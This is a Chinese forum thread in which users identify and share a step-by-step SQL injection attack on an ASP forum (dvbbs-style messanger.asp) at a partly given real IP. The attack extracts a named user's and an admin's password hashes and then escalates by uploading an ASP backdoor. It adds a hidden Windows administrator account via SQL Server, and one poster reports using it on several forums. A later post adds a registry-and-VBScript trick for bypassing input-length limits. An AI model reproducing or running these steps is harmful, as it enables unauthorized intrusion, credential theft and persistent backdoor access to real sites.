大家帮我看看这是什么语言啊。

[半梦半醒]

网页提交信息
<form action=http://61.156.**.***/bbs/messanger.asp?action=删除草稿 method=post>
<input type=text name=id width=32>
<input type=submit>
</form>
提交
select userpassword from [user] where username=0x72006100640069006f0066006c007900 and userpassword>7

大家帮我看看这是什么语言啊。

 

[fido555fido]

是SQL吧？

http://sqlcourse.com/select.html

 

[就是一枪]

DHTML
英文，还有中文

 

[苦逼热狗]

http://61.156.**.***/bbs/messanger.asp?action=删除草稿&id=(select userpassword from [user] where username=0x72006100640069006f0066006c007900 and userpassword>7)

ASP+SQL数据库注入,呵呵,什么论坛的啊
你要拿的那个叫radiofly的用户又跟你什么关系呢?

这个sql语句会返回那个radiofly用户的密码

 

[苦逼热狗]

呵呵
当我没说过吧
刚才去google搜索了一下radiofly messanger.asp就知道是什么东西了

第一步:用注册好的用户名登陆,登陆时选择保存cookie,撰写短消息,保存
第二步:利用下边网页提交信息
<form action=http://61.156.35.167/bbs/messanger.asp?action=删除草稿 method=post>
<input type=text name=id width=32>
<input type=submit>
</form>
username使用SQL Encoder编码,这里我们用一个管理员的名字radiofly
提交
select userpassword from [user] where username=0x72006100640069006f0066006c007900 and userpassword>7
得到
Microsoft ******** 编译器错误 错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp，行242

Microsoft OLE DB Provider for SQL Server 错误 '80040e07'

将 nvarchar 值 '78e4ea2181b00d21' 转换为数据类型为 int 的列时发生语法错误。

/bbs/messanger.asp，行619

78e4ea2181b00d21就是radiofly的前台密码

提交
select password from admin where username=0x72006100640069006f0066006c007900 and password>7
得到后台密码 acaa91f51ed197c7

用dvbbs密码猜解工具猜解密码 等待 等待 再等待。。。。。。ok
得到密码后登陆进入后台,修改文件上传类型,添加asp类型,上传asp后门
得到sql数据库的sa密码,使用sqlexec连接
net user admin$ xiaoxue /add
net localgroup administrators admin$ /add

到此 over
by 小路

 

[苦逼热狗]

写这个文章的人也有点没大脑
select可以用了,干吗不来个update
把自己提升为论坛管理员,然后再把上传附件类型调整为asp,其他后面的就跟他说的一样了
居然还要爆破密码,严重ft

 

[半梦半醒]

你还别说真的很管用啊，我用他这个方法找出好几个论坛的漏洞了。但大部分论坛做的还很好了。

 

[半梦半醒]

???狗，你对这个有研究啊。我有些还不太懂，帮我解答一下吧
------------len.reg-----------------
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt\\扩展(&E)]
@=\"C:\\\\Documents and Settings\\\\Administrator\\\\桌面\\\\len.htm\"
\"contexts\"=dword:00000004

-----------end----------------------

-----------len.htm------------------
******** language=vbs>
set srcevent = external.menuarguments.event
set doc=external.menuarguments.document
set ele=doc.elementfrompoint( srcevent.clientx, srcevent.clienty )
if ele.type =\"text\" or ele.type=\"password\" then
ele.maxlength=200
ele.size=200
end if
**********>
----------end-----------------------

用法:先把len.reg导入注册表(注意文件路径)
然后把len.htm拷到注册表中指定的地方.
打开网页,光标放在要改变长度的输入框上点右键,看多了一个叫扩展的选项了吧
单击搞定!

后记:同样的也就可以对付那些限制输入内容的脚本了.

附:防止本地提交的ASP代码.
<%
server_v1=Cstr(Request.ServerVariables(\"HTTP_REFERER\"))
server_v2=Cstr(Request.ServerVariables(\"SERVER_NAME\"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write \"

<center>******* border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>\"
response.write \"****>**** style=font:9pt Verdana>\"
response.write \"你提交的路径有误，禁止从站点外部提交数据请不要乱该参数！\"
response.write \"******>******>*********></center>\"
response.end
end if
%>
这个是怎么回事啊